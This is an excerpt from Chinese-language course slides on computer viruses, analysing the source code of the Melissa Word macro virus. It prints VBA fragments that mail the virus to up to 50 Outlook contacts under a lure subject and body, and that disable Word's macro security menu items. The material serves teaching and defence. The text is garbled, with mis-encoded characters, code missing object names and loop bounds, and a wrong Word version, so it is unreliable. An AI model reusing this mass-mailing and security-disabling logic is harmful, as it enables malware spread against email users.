【文章內(nèi)容簡(jiǎn)介】
reakUmoffASlice ?創(chuàng)建 Outlook應(yīng)用程序?qū)嵗龑?duì)象 Set UngaDasOutlook=CreateObject(“”) ’獲取 MAPI對(duì)象 Set DasMapiName= (“MAPI”) If UngaDasOutlook=”O(jiān)utlook” Then “profile”,”password” ?遍歷地址薄 , 進(jìn)行郵件發(fā)送操作 For y=1 To Set AddyBook= (y) X=1 Set BreakUmoffASlice= (0) For oo=1 To ?獲取第 n個(gè)收件人地址 Peep=(x) ?加入收件人地址 Peep X=x+1 梅麗莎病毒源碼分析 計(jì)算機(jī)病毒與防治課程小組 If x50 Then oo= Next oo ?設(shè)置郵件的主題 =”Important Message From ” amp。 ’ 設(shè)置郵件的正文 =”Here is that document you asked for… don?t show anyone else : )” ’加入郵件的附件 ?發(fā)送郵件 Next y ?斷開連接 Peep=”” End If 梅麗莎病毒源碼分析 計(jì)算機(jī)病毒與防治課程小組 修改 Word模版 梅麗莎病毒激活后 , 將感染 Word97和 Word2022的文檔并修改通用模板,使感染后的 Word運(yùn)行時(shí)“宏”菜單項(xiàng)不能使用 ,并且導(dǎo)致 Word軟件對(duì)文件轉(zhuǎn)換、打開帶有宏的文件、 , 使病毒的魔爪“ 天衣無縫”。最后 , 將病毒自身的代碼和所做的設(shè)置修改 ,利用一個(gè)很高超的方法一同寫入 , 使用戶以后打開 Word時(shí)病毒反復(fù)發(fā)作。 病毒中相關(guān)操作的核心代碼如下所示: 梅麗莎病毒源碼分析 計(jì)算機(jī)病毒與防治課程小組 ’使“ 宏” 工具欄的“ 安全” 項(xiàng)無效 CommandBars(“Macro”).Controls(“Security…”).Enabled=False ’ 使“工具”菜單欄的“宏”項(xiàng)無效 CommandBars(“Tools”).C